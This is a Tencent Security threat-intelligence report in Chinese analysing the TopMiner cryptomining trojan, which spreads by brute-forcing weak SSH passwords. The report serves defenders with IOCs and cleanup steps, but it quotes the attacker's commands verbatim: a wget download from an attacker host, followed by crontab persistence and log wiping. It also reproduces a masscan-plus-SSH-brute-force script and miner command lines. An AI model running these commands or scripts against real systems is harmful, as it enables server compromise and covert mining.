产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
- NEW最新动态
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云
- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
腾讯主机安全截获TOPMiner挖矿木马,受害服务器约1.5万台
2021-01-04 13:54:12
一、概述
腾讯主机安全(云镜)检测到挖矿木马TopMiner近期攻击十分活跃,该木马通过SSH弱口令爆破进行攻击入侵,会清除竞品挖矿木马,同时会使用爆破工具在内网横向传播。根据其挖矿钱包收益估算,约有1.5万台服务器被该团伙控制挖矿。由于其使用的挖矿木马名为top,腾讯安全将其命名为TopMiner挖矿木马。
TopMiner挖矿团伙针对SSH弱口令进行爆破攻击,成功后执行命令下载恶意shell脚本,并将启动脚本写入crontab定时任务进行持久化,shell脚本继续下载挖矿木马nginx、top启动挖矿。木马入侵系统后,还会下载SSH爆破程序sshd,扫描到网络中开放22端口的Linux系统机器后,通过实时更新的密码字典对其root账号进行爆破攻击。攻击者在爆破攻击程序代码留下注释:"宽带充足基本可以12个小时扫描全球",气焰可谓十分嚣张。
分析过程中,我们还在黑客控制的服务器上发现了具有执行远程命令功能的backdoor木马、具有DDoS攻击、远程shell功能的kaiji木马、黑客可使用这些木马对目标系统进行完全控制。
腾讯云主机安全(云镜)支持对云主机是否存在SSH空口令、弱口令进行检测并向客户告警,通过分析获得流行病毒木马内置的弱密码字典来检测云主机弱密码风险,具有很强的实战性。腾讯安全专家建议企业安全运维人员尽快解决服务器配置弱口令的风险。
腾讯安全专家建议企业安全运维人员对服务器进行检查,清理以下相关项:
文件和进程:
/tmp/.top-unix/nginx
/tmp/.ICE-unix1/top
/srv/.ICE-unix1/sshd
/srv/.ICE-unix1/scan.sh
/etc/ipv6_addrconf
/etc/crypto
Crontab定时任务:
/tmp/.top-unix/top -o stratum+tcp://pool.supportxmr.com:8080 -u 42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN -p X
/tmp/.top-unix/nginx -o stratum+tcp://mine.c3pool.com:15555 -u 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL -p X
/etc/crypto
腾讯安全系列产品可针对TopMiner挖矿木马攻击传播的各个环节进行阻断拦截:
针对TopMiner挖矿团伙的攻击,腾讯安全详细响应清单如下:
应用 场景 |
安全产品 |
解决方案 |
威 胁 情 报 |
腾讯T-Sec 威胁情报云查服务 (SaaS) |
1)TopMiner挖矿团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics |
腾讯T-Sec 高级威胁追溯系统 |
1)TopMiner挖矿团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts |
|
云原生 安全 防护 |
云防火墙 (Cloud Firewall,CFW) |
基于网络流量进行威胁检测与主动拦截,已支持: 1)TopMiner木马关联的IOCs已支持识别检测; 2)检测SSH弱口令爆破攻击。
有关云防火墙的更多信息,可参考: |
腾讯T-Sec 主机安全 (Cloud Workload Protection,CWP) |
1)已支持查杀TopMiner木马程序; 2)主动检测系统是否存在SSH弱口令并提示; 3)检测SSH弱口令爆破攻击。
腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp |
|
腾讯T-Sec 安全运营中心 |
基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html |
|
非云企业安全防护 |
腾讯T-Sec 高级威胁检测系统 (腾讯御界) |
1)已支持通过协议检测TopMiner木马与服务器的网络通信。
关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta |
二、详细分析
2.1、 攻击入侵方式
病毒通过SSH弱口令爆破入侵系统,随后执行恶意命令下载脚本crypto,并将其写入crontab定时任务。
bash -c
cd /etc
wget -P /etc http://103.45.183.12:808/crypto
chmod 0777 crypto
nohup /etc/crypto > /dev/null 2>&1 &
chattr +i /etc/crypto
echo "/etc/crypto">>/etc/rc.local
echo "/etc/crypto">>/etc/crontab
echo > /var/log/wtmp
history -c
crypto会检查自己的挖矿进程/tmp/.ICE-unix1/top是否存在,如果不存在会判断是否有竞品挖矿木马存在,然后会杀掉竞品挖矿木马进程kswapd0、rsync、tsm、work32、work64、go、joseph,然后从C2服务器下载挖矿木马top并启动挖矿。
Top挖矿木马下载地址为:http[:]//xiazai.qq360bidu.me:808/top
挖矿使用矿池:91.121.140.167:443
挖矿使用钱包:
43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL
根据其矿池算力平均340KH/s,可推算该挖矿团伙已控制约1.5万台服务器进行挖矿,平均每天获利约154美元(0.17个门罗币),折合人民币约1000元。
2.2、 横向移动
木马入侵系统后会接着下载端口爆破程序sshd以及待攻击的IP列表ips.txt、用户名字典user.txt、密码字典password.txt到/srv/.ICE-unix1/目录下。
观察文件被创建的时间,除了爆破程序sshd和用户名列表user.txt是6月份被修改过(可能是初次创建),其他文件操作时间均为12月,并且密码字典文件password.txt的修改时间就在近期。可见其感染系统后,攻击模块一直处于活跃状态,并且攻击对象、密码字典在持续更新扩充。
其中一个待爆破IP列表里有超过19万个IP地址:
爆破用户名:root,其中一个密码字典有1700余个密码,部分如下:
攻击时脚本scan.sh负责启动扫描进程masscan和爆破进程sshd,脚本代码如下:
#!/bin/bash
yum install masscan -y
apt-get install masscan -y
if [ $# -ne 4 ];
then
echo "脚本默认安装扫描工具为masscan"
echo "运行参数应为 ./scan.sh IP范围 端口 扫描线程 爆破线程"
echo "IP范围支持1.0.0.0-1.255.255.255或 1.0.0.0/8这种"
echo "扫描线程取1-100万左右,G口肯定是30-100万跑,线程越低结果越准,宽带充足基本可以1 2个小时扫描全球"
exit
fi
echo '' > a.txt
masscan $1 -p $2 --rate $3 --excludefile pingbi.txt -oL a.txt
echo '' > ip.txt
cat a.txt | grep -B0 open | grep -oP '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -u > ip.txt
./sshd ip.txt user.txt password.txt $2 $4
在实际攻击过程中,针对22端口进行爆破,爆破线程被设置为1000。
./sshd ips.txt user.txt password.txt 22 1000
2.3、 该团伙使用的其他木马
除了shell脚本、挖矿木马、爆破程序之外,我们在黑客控制的服务器上还发现了具有DDoS和远程shell功能的Kaiji木马,以及backdoor木马cnet2。
挖矿木马“ipv6_addrconf”、“systemd”、“top”为挖矿程序XMRig编译,其中“ipv6_addrconf”、“systemd”通过加UPX壳保护。
backdoor木马“cnet2”,具有监听端口,连接服务端,下载文件,执行远程命令等功能。
Kaiji木马“3”、“amd64”、“php-fpm”采用Go语言编写,具有DDoS攻击、远程shell以及SSH爆破攻击等功能,详情可参考腾讯安全此前的分析报告
https://s.tencent.com/research/report/1168.html。
IOCs
IP
103.45.183.12
Domain
xiazai.qq360bidu.me
URL
http[:]//xiazai.qq360bidu.me:808/top
http[:]//103.45.183.12:808/crypto
MD5
amd64 |
c491074d7723e6a6b1b1b8fb002f09b6 |
cnet2 |
9d2681b69116f866477dbe3bda0cbf49 |
top |
f74d1803befb993040aab866dbe6f12f |
systemd |
640c6f1e7a5efdba49aeaa06d0dac304 |
crypto |
9f0993ac09182d9ec08d1c562d2cfcbd |
sleep |
fbf0dccc0d9e674858d63e521eb122a0 |
sshd |
15a653e96bada2fc2e47db59d863f4ff |
ipv6_addrconf |
b641d939b7cf70606ff5826f68c47d29 |
钱包:
42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN
43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL
扫描以下二维码关注“腾讯安全威胁情报中心”公众号,掌握最新的网络安全威胁情报。
在线咨询
方案定制